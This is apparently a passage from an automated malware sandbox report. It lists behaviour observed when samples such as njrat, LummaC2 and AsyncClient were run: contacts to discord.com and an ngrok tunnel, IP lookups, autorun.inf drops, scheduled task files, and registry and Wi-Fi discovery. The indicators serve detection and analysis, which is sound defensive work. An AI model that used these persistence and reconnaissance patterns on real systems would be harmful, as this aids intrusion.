| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | 0.tcp.in.ngrok.io | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipapi.co | N/A | N/A |
| N/A | ipapi.co | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipapi.co | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ipapi.co | N/A | N/A |
| N/A | ipapi.co | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Drops autorun.inf file
| Description | Indicator | Process | Target |
| File created | C:\autorun.inf | C:\Windows\rundll32.exe | N/A |
| File opened for modification | C:\autorun.inf | C:\Windows\rundll32.exe | N/A |
| File created | D:\autorun.inf | C:\Windows\rundll32.exe | N/A |
| File created | F:\autorun.inf | C:\Windows\rundll32.exe | N/A |
| File opened for modification | F:\autorun.inf | C:\Windows\rundll32.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\BingWallpaperApp\\WPImages\\20241214.jpg" | C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI | C:\Users\Admin\Desktop\New Text Document mod.exse\a\TrackYourSentOLSetup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI | C:\Users\Admin\Desktop\New Text Document mod.exse\a\TrackYourSentOLSetup.exe | N/A |
| File created | C:\Program Files\Google\Chrome\Application\SS0T34UUZ0O3B.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File created | C:\Program Files\Google\Chrome\Application\DQMX7GNJJKEGRVV.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Wise Installation Wizard\WIS0E7C0CA4E536483D943BE977EA796DD9_1_0_0_182.MSI | C:\Users\Admin\Desktop\New Text Document mod.exse\a\NEOFreeSetup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Wise Installation Wizard\WIS0E7C0CA4E536483D943BE977EA796DD9_1_0_0_182.MSI | C:\Users\Admin\Desktop\New Text Document mod.exse\a\NEOFreeSetup.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\NigerMauritius | C:\Users\Admin\Desktop\4363463463464363463463463\Files\g9win6bb.exe | N/A |
| File opened for modification | C:\Windows\ManualsDenver | C:\Users\Admin\Desktop\4363463463464363463463463\Files\DivineDialogue.exe | N/A |
| File created | C:\Windows\0E7C0CA4E536483D943BE977EA796DD9.TMP\WiseCustomCalla3.dll | C:\Windows\syswow64\MsiExec.exe | N/A |
| File created | C:\Windows\Installer\e5a77f0.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\YrQueensland | C:\Users\Admin\Desktop\4363463463464363463463463\Files\DivineDialogue.exe | N/A |
| File opened for modification | C:\Windows\Installer\e5a77f0.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI89A6.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\ActivatedPopulation | C:\Users\Admin\Desktop\4363463463464363463463463\Files\random.exe | N/A |
| File opened for modification | C:\Windows\MiddleOrganize | C:\Users\Admin\Desktop\4363463463464363463463463\Files\g9win6bb.exe | N/A |
| File opened for modification | C:\Windows\BirthAttacked | C:\Users\Admin\Desktop\4363463463464363463463463\Files\DivineDialogue.exe | N/A |
| File created | C:\Windows\0E7C0CA4E536483D943BE977EA796DD9.TMP\WiseCustomCalla2.dll | C:\Windows\syswow64\MsiExec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8290.tmp-\CustomActions.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8290.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI89A6.tmp-\CustomActions.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\ThatsConscious | C:\Users\Admin\Desktop\4363463463464363463463463\Files\random.exe | N/A |
| File opened for modification | C:\Windows\ItKinda | C:\Users\Admin\Desktop\4363463463464363463463463\Files\random.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\Desktop\New Text Document mod.exse\a\ctx.exe | N/A |
| File opened for modification | C:\Windows\EmotionalCnet | C:\Users\Admin\Desktop\4363463463464363463463463\Files\g9win6bb.exe | N/A |
| File created | C:\Windows\rundll32.exe | C:\Users\Admin\Desktop\4363463463464363463463463\Files\njrat.exe | N/A |
| File opened for modification | C:\Windows\GtkRace | C:\Users\Admin\Desktop\4363463463464363463463463\Files\DivineDialogue.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7C36.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI89A6.tmp-\DispatchQueue.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\ConvertedTechnologies | C:\Users\Admin\Desktop\4363463463464363463463463\Files\random.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5a77f4.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8290.tmp-\Microsoft.Deployment.WindowsInstaller.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8290.tmp-\DispatchQueue.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI89A6.tmp-\Microsoft.Deployment.WindowsInstaller.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\rundll32.exe | C:\Windows\rundll32.exe | N/A |
| File created | C:\Windows\0E7C0CA4E536483D943BE977EA796DD9.TMP\WiseCustomCalla.dll | C:\Windows\syswow64\MsiExec.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\Desktop\4363463463464363463463463\Files\nothjgdwa.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{240D9941-B463-4B9C-B483-7129740B9AC1} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI89A6.tmp-\CustomAction.config | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\AppData\Local\Temp\347814563.exe | N/A |
| File opened for modification | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\AppData\Local\Temp\347814563.exe | N/A |
| File opened for modification | C:\Windows\rundll32.exe | C:\Users\Admin\Desktop\4363463463464363463463463\Files\njrat.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8290.tmp-\CustomAction.config | C:\Windows\SysWOW64\rundll32.exe | N/A |
Browser Information Discovery
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Embeds OpenSSL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Installer Packages
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\AsyncClient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\langla.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla-stage2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\choice.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\nothjgdwa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\fcxcx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\mtbkkesfthae.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\GOLD1234.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\FINAL_PDF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\GoogleUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\DivineDialogue.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\njrat.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\neptuno.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\sysnldcvmr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\4434.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\t.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Out2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files\Google\Chrome\Application\SS0T34UUZ0O3B.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\BWCStartMSI.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\s.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\g9win6bb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\LummaC2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\pp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\614016133.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\609587\Horizon.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\dayum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\choice.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\4363463463464363463463463\Files\noll.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Desktop\4363463463464363463463463\Files\noll.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
